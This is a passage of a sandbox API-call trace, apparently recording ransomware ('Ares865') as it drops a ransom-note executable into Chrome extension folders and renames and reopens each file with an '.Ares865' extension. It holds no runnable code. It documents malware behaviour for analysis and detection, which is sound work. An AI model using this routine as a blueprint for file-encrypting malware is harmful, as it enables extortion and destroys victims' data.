lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.458] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.458] GetLastError () returned 0x0 [0101.459] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.459] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82676880, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5bfde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5bfde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.459] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.459] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.459] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.459] lstrlenW (lpString="messages.json") returned 13 [0101.459] lstrlenW (lpString="Ares865") returned 7 [0101.459] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.459] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.Ares865") returned 164 [0101.459] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.461] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=705) returned 1 [0101.464] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg" [0101.464] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg" [0101.464] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.464] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.465] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.465] GetLastError () returned 0x0 [0101.465] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.465] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8266a530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5bfde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5bfde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.465] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.465] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.465] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.465] lstrlenW (lpString="messages.json") returned 13 [0101.466] lstrlenW (lpString="Ares865") returned 7 [0101.466] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.466] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.Ares865") returned 164 [0101.466] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.468] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=886) returned 1 [0101.470] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images" [0101.470] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images" [0101.470] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.470] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.471] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.471] GetLastError () returned 0x0 [0101.471] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.471] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828a32c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5e5f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5e5f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.472] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.472] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.472] lstrcpyW (in: lpString1=0x2cce514, lpString2="flapper.gif" | out: lpString1="flapper.gif") returned="flapper.gif" [0101.472] lstrlenW (lpString="flapper.gif") returned 11 [0101.472] lstrlenW (lpString="Ares865") returned 7 [0101.472] lstrcmpiW (lpString1="per.gif", lpString2="Ares865") returned 1 [0101.472] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.Ares865") returned 157 [0101.472] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.ares865"), dwFlags=0x1) returned 1 [0101.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.474] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=70364) returned 1 [0101.480] lstrcpyW (in: lpString1=0x2cce514, lpString2="icon_128.png" | out: lpString1="icon_128.png") returned="icon_128.png" [0101.480] lstrlenW (lpString="icon_128.png") returned 12 [0101.480] lstrlenW (lpString="Ares865") returned 7 [0101.480] lstrcmpiW (lpString1="128.png", lpString2="Ares865") returned -1 [0101.480] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.Ares865") returned 158 [0101.480] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.ares865"), dwFlags=0x1) returned 1 [0101.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.482] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4361) returned 1 [0101.484] lstrcpyW (in: lpString1=0x2cce514, lpString2="icon_16.png" | out: lpString1="icon_16.png") returned="icon_16.png" [0101.485] lstrlenW (lpString="icon_16.png") returned 11 [0101.485] lstrlenW (lpString="Ares865") returned 7 [0101.485] lstrcmpiW (lpString1="_16.png", lpString2="Ares865") returned -1 [0101.485] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.Ares865") returned 157 [0101.485] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.ares865"), dwFlags=0x1) returned 1 [0101.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.487] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=556) returned 1 [0101.490] lstrcpyW (in: lpString1=0x2cce514, lpString2="topbar_floating_button.png" | out: lpString1="topbar_floating_button.png") returned="topbar_floating_button.png" [0101.490] lstrlenW (lpString="topbar_floating_button.png") returned 26 [0101.490] lstrlenW (lpString="Ares865") returned 7 [0101.490] lstrcmpiW (lpString1="ton.png", lpString2="Ares865") returned 1 [0101.490] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.Ares865") returned 172 [0101.491] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.ares865"), dwFlags=0x1) returned 1 [0101.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.492] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=160) returned 1 [0101.495] lstrcpyW (in: lpString1=0x2cce514, lpString2="topbar_floating_button_close.png" | out: lpString1="topbar_floating_button_close.png") returned="topbar_floating_button_close.png" [0101.495] lstrlenW (lpString="topbar_floating_button_close.png") returned 32 [0101.495] lstrlenW (lpString="Ares865") returned 7 [0101.495] lstrcmpiW (lpString1="ose.png", lpString2="Ares865") returned 1 [0101.495] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.Ares865") returned 178 [0101.495] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.ares865"), dwFlags=0x1) returned 1 [0101.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.497] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=252) returned 1 [0101.500] lstrcpyW (in: lpString1=0x2cce514, lpString2="topbar_floating_button_hover.png" | out: lpString1="topbar_floating_button_hover.png") returned="topbar_floating_button_hover.png" [0101.500] lstrlenW (lpString="topbar_floating_button_hover.png") returned 32 [0101.500] lstrlenW (lpString="Ares865") returned 7 [0101.500] lstrcmpiW (lpString1="ver.png", lpString2="Ares865") returned 1 [0101.500] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.Ares865") returned 178 [0101.500] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.ares865"), dwFlags=0x1) returned 1 [0101.501] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.502] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=160) returned 1 [0101.506] lstrcpyW (in: lpString1=0x2cce514, lpString2="topbar_floating_button_maximize.png" | out: lpString1="topbar_floating_button_maximize.png") returned="topbar_floating_button_maximize.png" [0101.506] lstrlenW (lpString="topbar_floating_button_maximize.png") returned 35 [0101.506] lstrlenW (lpString="Ares865") returned 7 [0101.506] lstrcmpiW (lpString1="ize.png", lpString2="Ares865") returned 1 [0101.506] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.Ares865") returned 181 [0101.506] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 